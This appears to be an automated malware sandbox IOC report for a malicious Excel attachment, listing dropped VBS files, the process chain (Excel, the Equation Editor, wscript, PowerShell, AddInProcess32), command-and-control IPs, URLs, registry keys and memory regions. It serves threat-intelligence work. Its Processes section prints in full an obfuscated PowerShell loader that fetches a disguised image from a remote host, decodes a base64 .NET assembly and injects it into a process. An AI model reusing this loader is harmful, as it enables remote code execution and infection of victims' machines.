IOC Report
Nuevo orden.xlam.xlsx

loading gif

Files

File Path
Type
Category
Malicious
Nuevo orden.xlam.xlsx
Microsoft Excel 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\datingloverstartingAgain[1].vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\~$Nuevo orden.xlam.xlsx
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\hvvkv2tt.42n.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wkrr2skg.twx.psm1
very short file (no magic)
dropped
C:\Users\user\Desktop\~$Nuevo orden.xlam.xls
data
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious

URLs

Name
IP
Malicious
http://91.92.254.194/imge/new-image_v.jpgEnN;
unknown
malicious
http://91.92.254.194
unknown
malicious
http://91.92.254.194/imge/new-image_v.jpg
91.92.254.194
malicious
http://192.3.216.148/base64.txt
192.3.216.148
malicious
http://192.3.216.148/datingloverstartingAgain.vbs
192.3.216.148
malicious
http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txtVO
unknown
http://nuget.org/NuGet.exe
unknown
https://account.dyn.com/
unknown
http://192.3.216.148
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
http://ip-api.com
unknown
https://contoso.com/Icon
unknown
http://192.3.216.148/base6L
unknown
http://192.3.216.148/datingloverstartingAgain.vbsj
unknown
http://192.3.2168
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txt
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
malicious

IPs

IP
Domain
Country
Malicious
91.92.254.29
unknown
Bulgaria
malicious
208.95.112.1
ip-api.com
United States
malicious
192.3.216.148
unknown
United States
malicious
91.92.254.194
unknown
Bulgaria
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
74*
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
k8*
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileDirectory
There are 28 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3419000
trusted library allocation
page read and write
malicious
33B9000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
41E000
heap
page read and write
2E63000
heap
page read and write
3B2F000
stack
page read and write
475000
heap
page read and write
51F000
heap
page read and write
49B000
heap
page read and write
8CBE000
stack
page read and write
CD000
trusted library allocation
page execute and read and write
5D6E000
stack
page read and write | page guard
4D7000
heap
page read and write
487000
heap
page read and write
1FC0000
direct allocation
page read and write
9740000
heap
page read and write
CB000
stack
page read and write
494000
heap
page read and write
4C6000
heap
page read and write
228D000
trusted library allocation
page read and write
376000
stack
page read and write
450000
trusted library allocation
page read and write
447000
heap
page read and write
467000
heap
page read and write
4CEE000
stack
page read and write
3620000
trusted library allocation
page read and write
4AF000
heap
page read and write
63D000
stack
page read and write
54BE000
stack
page read and write
498000
heap
page read and write
1F9E000
stack
page read and write
202000
trusted library allocation
page read and write
5ADE000
stack
page read and write
492000
heap
page read and write
64C000
heap
page read and write
4F04000
heap
page read and write
770000
heap
page read and write
5791000
heap
page read and write
8E0000
trusted library allocation
page read and write
447B000
stack
page read and write
5A0000
trusted library allocation
page read and write
677000
heap
page read and write
492000
heap
page read and write
320000
trusted library allocation
page read and write
2062000
heap
page read and write
130000
heap
page read and write
45D0000
trusted library allocation
page read and write
483000
heap
page read and write
AB0000
heap
page read and write
3A3000
heap
page read and write
619E000
stack
page read and write
350000
heap
page read and write
447E000
stack
page read and write
4B6E000
stack
page read and write
75E000
stack
page read and write
44F000
heap
page read and write
5F2E000
stack
page read and write
5C70000
heap
page read and write
220000
heap
page read and write
3361000
trusted library allocation
page read and write
4CF000
heap
page read and write
D6000
trusted library allocation
page execute and read and write
5532000
heap
page read and write
9350000
trusted library allocation
page read and write
10000
heap
page read and write
2CD000
stack
page read and write
65D000
heap
page read and write
2414000
trusted library allocation
page read and write
4D3E000
stack
page read and write
880F000
heap
page read and write
894C000
stack
page read and write
9000000
heap
page read and write
358000
heap
page read and write
DDD000
stack
page read and write
4C6000
heap
page read and write
49B000
heap
page read and write
6A3000
heap
page read and write
400000
remote allocation
page execute and read and write
1F24000
heap
page read and write
30E0000
heap
page read and write
6C9000
heap
page read and write
8814000
heap
page read and write
AA0000
trusted library allocation
page read and write
10000
heap
page read and write
4F4000
heap
page read and write
8FFD000
stack
page read and write
5F0000
heap
page execute and read and write
3CA0000
heap
page read and write
33A0000
trusted library allocation
page read and write
DA000
trusted library allocation
page execute and read and write
4502000
trusted library allocation
page read and write
47AE000
stack
page read and write
3CD000
stack
page read and write
497000
heap
page read and write
5EBE000
stack
page read and write
623A000
trusted library allocation
page read and write
249F000
trusted library allocation
page read and write
4580000
trusted library allocation
page read and write
48A000
heap
page read and write
5C0E000
stack
page read and write
3EEF000
stack
page read and write
51E000
stack
page read and write
D0E000
stack
page read and write
4B1E000
stack
page read and write
492000
heap
page read and write
298F000
stack
page read and write
27F000
stack
page read and write
9350000
trusted library allocation
page read and write
24BF000
stack
page read and write
4B6000
heap
page read and write
650000
heap
page read and write
11A000
stack
page read and write
657000
heap
page read and write
87FF000
heap
page read and write
4DDE000
stack
page read and write
4C5000
heap
page read and write
478000
heap
page read and write
44C000
heap
page read and write
49B000
heap
page read and write
4C2E000
stack
page read and write
353F000
stack
page read and write
44A0000
trusted library allocation
page execute and read and write
397000
heap
page read and write
C0000
trusted library allocation
page read and write
5513000
heap
page read and write
4B6000
heap
page read and write
530000
trusted library allocation
page read and write
590000
trusted library allocation
page read and write
487000
heap
page read and write
43D000
heap
page read and write
25E000
stack
page read and write
2040000
heap
page read and write
489E000
stack
page read and write
160000
heap
page read and write
210000
remote allocation
page read and write
5C74000
heap
page read and write
475000
heap
page read and write
4F90000
heap
page read and write
6689000
trusted library allocation
page read and write
91A0000
heap
page read and write
460000
heap
page read and write
AB8000
heap
page read and write
4B80000
heap
page execute and read and write
4DE0000
heap
page read and write
9AF000
stack
page read and write
9350000
trusted library allocation
page read and write
120000
trusted library allocation
page read and write
5F80000
heap
page read and write
400000
heap
page read and write
2251000
trusted library allocation
page read and write
240000
trusted library allocation
page execute and read and write
6C7000
heap
page read and write
499F000
stack
page read and write
2D0000
heap
page read and write
48A000
heap
page read and write
92E0000
trusted library allocation
page read and write
43F000
heap
page read and write
10000
heap
page read and write
4F2D000
heap
page read and write
4C5000
heap
page read and write
9350000
trusted library allocation
page read and write
260000
trusted library allocation
page read and write
4D0000
trusted library allocation
page read and write
411E000
stack
page read and write
8B5F000
stack
page read and write
A0000
trusted library allocation
page read and write
417000
heap
page read and write
401000
heap
page read and write
483000
heap
page read and write
61A1000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
678000
trusted library allocation
page read and write
5BA000
heap
page read and write
48A000
heap
page read and write
33B2000
trusted library allocation
page read and write
3EA000
heap
page read and write
5250000
heap
page read and write
F2F000
stack
page read and write
3628000
heap
page read and write
7EF40000
trusted library allocation
page execute and read and write
A16000
heap
page execute and read and write
477000
heap
page read and write
498000
heap
page read and write
123000
trusted library allocation
page execute and read and write
5C00000
heap
page read and write
35E0000
heap
page read and write
92E0000
trusted library allocation
page read and write
5D1E000
stack
page read and write
446000
heap
page read and write
375000
heap
page read and write
5E5D000
stack
page read and write
9350000
trusted library allocation
page read and write
389000
stack
page read and write
2D0000
trusted library allocation
page execute and read and write
3030000
heap
page read and write
43E0000
trusted library allocation
page read and write
642000
heap
page read and write
5E1E000
stack
page read and write
8B80000
heap
page read and write
465000
heap
page read and write
9350000
trusted library allocation
page read and write
92DC000
stack
page read and write
DA0000
heap
page read and write
9B0000
trusted library allocation
page read and write
604000
heap
page read and write
242C000
trusted library allocation
page read and write
89000
stack
page read and write
5E0000
heap
page read and write
650000
heap
page read and write
5D6F000
stack
page read and write
4D7000
trusted library allocation
page read and write
2395000
trusted library allocation
page read and write
10000
heap
page read and write
DA4000
heap
page read and write
1E0000
trusted library allocation
page read and write
410000
heap
page read and write
492000
heap
page read and write
242A000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
4CF000
heap
page read and write
540000
heap
page execute and read and write
9C0000
trusted library allocation
page read and write
4343000
trusted library allocation
page read and write
643000
heap
page read and write
241C000
trusted library allocation
page read and write
483000
heap
page read and write
2389000
trusted library allocation
page read and write
890E000
stack
page read and write
403000
heap
page read and write
5D7000
heap
page read and write
5090000
heap
page read and write
2CB0000
heap
page read and write
580000
trusted library allocation
page execute and read and write
44D000
heap
page read and write
4F6C000
heap
page read and write
4BD000
heap
page read and write
205000
trusted library allocation
page execute and read and write
465D000
stack
page read and write
6669000
trusted library allocation
page read and write
54F0000
heap
page read and write
447000
heap
page read and write
478000
heap
page read and write
4310000
trusted library allocation
page read and write
2CDE000
stack
page read and write
5780000
heap
page read and write
110000
trusted library allocation
page read and write
3861000
trusted library allocation
page read and write
96D000
stack
page read and write
87D0000
heap
page read and write
4B6000
heap
page read and write
9350000
trusted library allocation
page read and write
4DFD000
heap
page read and write
411000
heap
page read and write
243F000
trusted library allocation
page read and write
B9D000
stack
page read and write
8B1F000
stack
page read and write
CCF000
stack
page read and write
124000
trusted library allocation
page read and write
526D000
heap
page read and write
D90000
trusted library allocation
page read and write
69F000
heap
page read and write
2E0000
heap
page read and write
499000
heap
page read and write
2A5E000
stack
page read and write
4BD000
heap
page read and write
5AE000
stack
page read and write
2E00000
heap
page read and write
127000
trusted library allocation
page execute and read and write
49DE000
stack
page read and write
280000
heap
page read and write
5FC0000
heap
page read and write
32B0000
trusted library allocation
page read and write
4ABF000
stack
page read and write
12D000
trusted library allocation
page execute and read and write
2F0E000
stack
page read and write
467000
heap
page read and write
43E000
remote allocation
page execute and read and write
287000
heap
page read and write
2C60000
heap
page read and write
60F000
heap
page read and write
2CBB000
heap
page read and write
288F000
stack
page read and write
5F7E000
stack
page read and write
4D9000
trusted library allocation
page read and write
DC2000
heap
page read and write
1FB0000
heap
page read and write
4CE000
stack
page read and write
4510000
trusted library allocation
page execute and read and write
37C000
stack
page read and write
1EBE000
stack
page read and write
4480000
trusted library allocation
page read and write
9AE000
stack
page read and write | page guard
6B0000
heap
page read and write
20000
heap
page read and write
3210000
heap
page read and write
5DAE000
stack
page read and write
48A000
heap
page read and write
9350000
trusted library allocation
page read and write
48A000
heap
page read and write
4B6000
heap
page read and write
45F000
heap
page read and write
2BCF000
stack
page read and write
A10000
heap
page execute and read and write
B3000
trusted library allocation
page execute and read and write
483000
heap
page read and write
492000
heap
page read and write
4A00000
trusted library allocation
page read and write
3389000
trusted library allocation
page read and write
243C000
trusted library allocation
page read and write
5C4E000
stack
page read and write
1F20000
heap
page read and write
87CD000
stack
page read and write
8DBD000
stack
page read and write
210000
remote allocation
page read and write
4A3000
heap
page read and write
4B6000
heap
page read and write
465000
heap
page read and write
8ADF000
stack
page read and write
4C6000
heap
page read and write
58CF000
stack
page read and write
2ABD000
heap
page read and write
8F0000
heap
page read and write
4490000
trusted library allocation
page read and write
BD000
trusted library allocation
page execute and read and write
2B0000
trusted library section
page read and write
660000
heap
page read and write
492000
heap
page read and write
B7000
stack
page read and write
9350000
trusted library allocation
page read and write
4CC000
heap
page read and write
2400000
trusted library allocation
page read and write
48A000
heap
page read and write
4C5000
heap
page read and write
430E000
stack
page read and write
3190000
heap
page read and write
4CE000
heap
page read and write
7D0000
heap
page execute and read and write
4BD000
heap
page read and write
2361000
trusted library allocation
page read and write
23FA000
trusted library allocation
page read and write
B0000
trusted library allocation
page read and write
A90000
trusted library allocation
page read and write
2CB8000
heap
page read and write
49B000
heap
page read and write
5D0000
heap
page read and write
2C0E000
stack
page read and write
4B6E000
stack
page read and write
4BD000
heap
page read and write
484000
heap
page read and write
5B9E000
stack
page read and write
4EF0000
heap
page read and write
2D00000
heap
page read and write
48E000
stack
page read and write
245F000
stack
page read and write
5F2F000
stack
page read and write
2CB4000
heap
page read and write
4B6000
heap
page read and write
439C000
stack
page read and write
250000
trusted library allocation
page read and write
3279000
trusted library allocation
page read and write
4BD000
heap
page read and write
2A9E000
stack
page read and write
3251000
trusted library allocation
page read and write
443000
heap
page read and write
5C92000
heap
page read and write
6B5000
heap
page read and write
475000
heap
page read and write
D8E000
stack
page read and write
48A000
heap
page read and write
12B000
trusted library allocation
page execute and read and write
3C8E000
stack
page read and write
485000
heap
page read and write
4C5000
heap
page read and write
9350000
trusted library allocation
page read and write
4A5D000
stack
page read and write
89A0000
heap
page read and write
32B0000
trusted library allocation
page read and write
5B0000
heap
page read and write
43DB000
stack
page read and write
4A4E000
stack
page read and write
461E000
stack
page read and write
4500000
trusted library allocation
page read and write
442B000
stack
page read and write
9350000
trusted library allocation
page read and write
4F52000
heap
page read and write
320E000
stack
page read and write
554000
heap
page read and write
2E60000
heap
page read and write
4BD000
heap
page read and write
492000
heap
page read and write
4F49000
heap
page read and write
3A0000
heap
page read and write
4AD000
heap
page read and write
9350000
trusted library allocation
page read and write
2C4E000
stack
page read and write
8EBD000
stack
page read and write
7EF20000
trusted library allocation
page execute and read and write
CCE000
stack
page read and write | page guard
4CE000
heap
page read and write
4B6000
heap
page read and write
2044000
heap
page read and write
460000
heap
page read and write
1FFF000
stack
page read and write
4D9E000
stack
page read and write
9350000
trusted library allocation
page read and write
475000
heap
page read and write
910F000
stack
page read and write
D2000
trusted library allocation
page read and write
4C5000
heap
page read and write
2AA0000
heap
page read and write
A0F000
stack
page read and write
49C000
heap
page read and write
2C9F000
stack
page read and write
2428000
trusted library allocation
page read and write
4430000
trusted library allocation
page read and write
487000
heap
page read and write
310000
heap
page read and write
4334000
trusted library allocation
page read and write
4FAC000
stack
page read and write
455C000
stack
page read and write
32B0000
trusted library allocation
page read and write
898C000
stack
page read and write
42C0000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
49B000
heap
page read and write
483000
heap
page read and write
1EA000
trusted library allocation
page read and write
524D000
stack
page read and write
482D000
stack
page read and write
533000
heap
page read and write
4EE0000
heap
page read and write
434000
heap
page read and write
B4000
trusted library allocation
page read and write
33E0000
heap
page read and write
16C000
stack
page read and write
18A000
stack
page read and write
1F42000
heap
page read and write
450000
heap
page read and write
580000
trusted library allocation
page execute and read and write
478000
heap
page read and write
483000
heap
page read and write
5D80000
heap
page read and write
122000
trusted library allocation
page read and write
49B000
heap
page read and write
4BDD000
stack
page read and write
45CA000
stack
page read and write
8FBF000
stack
page read and write
4BD000
heap
page read and write
3620000
heap
page read and write
87ED000
heap
page read and write
5E7000
heap
page read and write
92E0000
trusted library allocation
page read and write
1EFF000
stack
page read and write
There are 443 hidden memdumps, click here to show them.